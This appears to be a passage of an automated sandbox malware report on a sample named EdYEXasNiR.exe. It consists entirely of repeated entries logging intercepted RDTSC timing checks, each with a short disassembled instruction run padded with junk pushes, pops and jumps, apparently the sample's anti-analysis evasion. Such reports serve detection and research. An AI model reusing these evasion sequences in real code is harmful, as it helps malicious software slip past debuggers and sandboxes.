                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AA7A second address: F2AA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED10FBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD358ED10FFh 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE0000 second address: EE0004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE0004 second address: EE006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD358ED10F8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 ja 00007FD358ED1102h 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D2906h], ecx 0x0000001d mov cl, dl 0x0000001f push 00000004h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FD358ED10F8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov dword ptr [ebp+124745E2h], esi 0x00000041 jnl 00007FD358ED10F6h 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a jns 00007FD358ED10FCh 0x00000050 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE006F second address: EE0075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE0075 second address: EE0079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE0079 second address: EE009B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD358DA46E7h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AD6E second address: F2AD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2AD74 second address: F2AD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E4h 0x00000009 popad 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2B796 second address: F2B7B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD358ED10FBh 0x0000000f jc 00007FD358ED10F6h 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2B7B1 second address: F2B7BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2B7BD second address: F2B7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EECC second address: F2EEE8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD358DA46DEh 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEE8 second address: F2EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEEC second address: F2EEF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEF0 second address: F2EEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2F4B5 second address: F2F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2F4BB second address: F2F4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337D0 second address: F337DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD358DA46D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337DA second address: F337E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337E0 second address: F337F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD358DA46DCh 0x00000008 pushad 0x00000009 ja 00007FD358DA46D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337F7 second address: F337FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337FD second address: F33820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FD358DA46E5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33820 second address: F33826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9F441 second address: E9F445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9F445 second address: E9F44B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F32FD1 second address: F32FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD358DA46D6h 0x0000000a push edx 0x0000000b jno 00007FD358DA46D6h 0x00000011 jnl 00007FD358DA46D6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jns 00007FD358DA46D6h 0x00000021 pop esi 0x00000022 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33126 second address: F3312C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3312C second address: F33130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33130 second address: F33136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33136 second address: F33140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33140 second address: F33144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3342C second address: F33430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F39F38 second address: F39F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4DC second address: F3A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E8h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4F8 second address: F3A4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4FC second address: F3A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A502 second address: F3A50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD358ED10F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A50E second address: F3A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAAD second address: F3AAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAB3 second address: F3AACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jng 00007FD358DA46DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AACC second address: F3AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAD4 second address: F3AADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AADA second address: F3AADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AADE second address: F3AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD358DA46D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FD358DA46D6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3ADC4 second address: F3ADCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3ADCB second address: F3ADEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FD358DA46DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FD358DA46D6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0E5 second address: F3B0EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0EA second address: F3B0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0F2 second address: F3B11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007FD358ED10FEh 0x0000000e jmp 00007FD358ED10FDh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B411 second address: F3B42D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FD358DA46D6h 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B6BC second address: F3B6C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B6C4 second address: F3B6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93824 second address: E93828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93828 second address: E9383C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FD358DA46DAh 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9383C second address: E93864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FD358ED10F6h 0x0000000b je 00007FD358ED10F6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD358ED10FAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD358ED10F6h 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93864 second address: E9386C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9386C second address: E93871 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EE5 second address: F41EF5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46D6h 0x00000008 jno 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EF5 second address: F41EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EFB second address: F41F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41F01 second address: F41F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45887 second address: F4589E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46DFh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4589E second address: F458A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458A4 second address: F458AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458AB second address: F458BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD358ED10F6h 0x0000000a jmp 00007FD358ED10FAh 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458BF second address: F458C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B65 second address: F45B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B69 second address: F45B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B83 second address: F45BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1109h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45BA6 second address: F45BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E9h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4C5AD second address: F4C5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD358ED1101h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4C720 second address: F4C724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4DB26 second address: F4DB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F51C6F second address: F51C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD358DA46EAh 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F58E5E second address: F58E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FD358ED10F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F58E6D second address: F58E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69C70 second address: F69C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8E761 second address: E8E765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6970F second address: F6971B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6971B second address: F6971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6971F second address: F69723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69723 second address: F69729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69729 second address: F69731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69731 second address: F69735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8E747 second address: E8E761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED10FAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FD358ED10F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6E7E9 second address: F6E7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6E7EF second address: F6E7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F77B51 second address: F77B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F77B55 second address: F77B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F8076C second address: F80770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F80770 second address: F80774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F145 second address: F7F14B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F14B second address: F7F177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnl 00007FD358ED10F6h 0x00000011 jnl 00007FD358ED10F6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F3F9 second address: F7F3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F6A4 second address: F7F6AE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD358ED10FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F7ED second address: F7F813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD358DA46E4h 0x00000010 ja 00007FD358DA46D6h 0x00000016 popad 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F813 second address: F7F82D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD358ED110Ch 0x00000008 jmp 00007FD358ED1100h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F82D second address: F7F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FD358DA46D6h 0x0000000c rdtsc
